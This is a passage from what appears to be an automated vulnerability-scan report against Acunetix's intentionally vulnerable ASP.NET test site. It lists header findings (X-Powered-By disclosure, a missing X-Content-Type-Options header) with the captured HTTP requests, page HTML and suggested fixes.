          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/rVVS1oArBGNWHuMPoCTb1Ib2vQA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						<span id="lblStatus">Subscription successfull. Please visit the login page to login.</span>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

      3. X-Content-Type-Options Header Missing (34)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
